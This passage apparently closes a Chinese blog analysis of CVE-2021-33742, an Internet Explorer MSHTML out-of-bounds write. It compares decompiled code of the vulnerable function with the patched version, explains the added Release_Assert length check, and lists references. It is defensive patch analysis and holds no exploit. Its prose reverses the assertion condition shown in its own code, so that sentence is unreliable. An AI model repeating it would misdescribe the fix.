  pTreeDataPos = *ppTreeDataPos;
  pTreeDataPos->_cElemLeftAndFlags = pTreeDataPos->_cElemLeftAndFlags & 0xFFFFFFF4 | 4;
  if ( a9 )
    pTreeDataPos->dptp.t._lTextID |= 0x20000000u;
  pTreeDataPos->dptp.t._sid_cch = SrcTextCch & 0x1FFFFFF | (sid << 25);
  if ( eHLM < 80000 )
    pTreeDataPos->dptp.t._lTextID = lTextID;
  else
    pTreeDataPos->dptp.t._lTextID = (a9 << 29) | ((a8 << 30) | lTextID & 0x1FFFFFFF) & 0xDFFFFFFF;
  pTreeDataPos->_ulRefs_Flags = pTreeDataPos->_ulRefs_Flags & 0xFFFFFFF7 | 3;
  CTreeDataPos::UpdateWhiteSpaceTypeConsideringNewText(pTreeDataPos, SrcTextPtr, SrcTextCch);
}

//补丁后:
void __fastcall Tree::TreeWriter::NewTextPosInternal(CTreeDataPos **ppTreeDataPos, const wchar_t *SrcTextPtr, ULONG SrcTextCch, const CTreePos *a4, enum htmlLayoutMode eHLM, BYTE sid, LONG lTextID, int a8, bool a9)
{
  CTreeDataPos *pTreeDataPos; // esi

  pTreeDataPos = *ppTreeDataPos;
  (*ppTreeDataPos)->_cElemLeftAndFlags = (*ppTreeDataPos)->_cElemLeftAndFlags & 0xFFFFFFF4 | 4;
  if ( a9 )
    pTreeDataPos->dptp.t._lTextID |= 0x20000000u;
  if ( (unsigned __int8)wil::Feature<__WilFeatureTraits_Feature_Servicing_2106b_33613045>::__private_IsEnabled() )
    Release_Assert((int)SrcTextCch < 0x2000000);
  pTreeDataPos->dptp.t._sid_cch = SrcTextCch & 0x1FFFFFF | (sid << 25);
  if ( eHLM >= 80000 )
    pTreeDataPos->dptp.t._lTextID = (a9 << 29) | ((a8 << 30) | lTextID & 0x1FFFFFFF) & 0xDFFFFFFF;
  else
    pTreeDataPos->dptp.t._lTextID = lTextID;
  pTreeDataPos->_ulRefs_Flags = pTreeDataPos->_ulRefs_Flags & 0xFFFFFFF7 | 3;
  CTreeDataPos::UpdateWhiteSpaceTypeConsideringNewText(pTreeDataPos, SrcTextPtr, SrcTextCch);
}
void __fastcall Release_Assert(bool a1)
{
  if ( !a1 )
    Abandonment::AssertionFailed();             // 断言失败
}
void __stdcall Abandonment::AssertionFailed()
{
  void *retaddr; // [esp+4h] [ebp+4h]

  Abandonment::InduceAbandonment(10, retaddr, 0, 0);
  __debugbreak();
}
void __thiscall Abandonment::InduceAbandonment(void *this, int a2, int a3)
{
  Abandonment::hostExceptionFilter = SetUnhandledExceptionFilter(0);
  RaiseException(0x80000003, 1u, this, 0);
}

可以看到打了补丁后的Tree::TreeWriter::NewTextPosInternal()函数在向CTreeDataPos对象中结构体DATAPOSTEXT的_cch成员写入文本字符串长度之前,进行了一个判断。如果SrcTextCch < 0x2000000,就会触发断言失败。普通断言(assert())只有在debug版本的文件中会得到执行,而在release版本的文件中不会得到执行。这里使用的是一种由C++提供的,可以添加到release版本的文件中的断言函数Release_Assert()。断言失败后,通过SetUnhandledExceptionFilter()函数设置异常处理函数,并会抛出一个断点异常。之后会一直在异常处理流程中,并不会造成IE执行堆越界写的代码。

 

参考链接

1、Google Project Zero – CVE-2021-33742: Internet Explorer out-of-bounds write in MSHTML
2、Google Threat Analysis Group – How we protect users from 0-day attacks
3、weolar – 丢几个好东西,完整可编译的ie2、ie5.5源码,嘿嘿
4、o_0xF2B8F2B8 – IE DOM树概览
5、Microsoft Edge Team – Modernizing the DOM tree in Microsoft Edge

(完)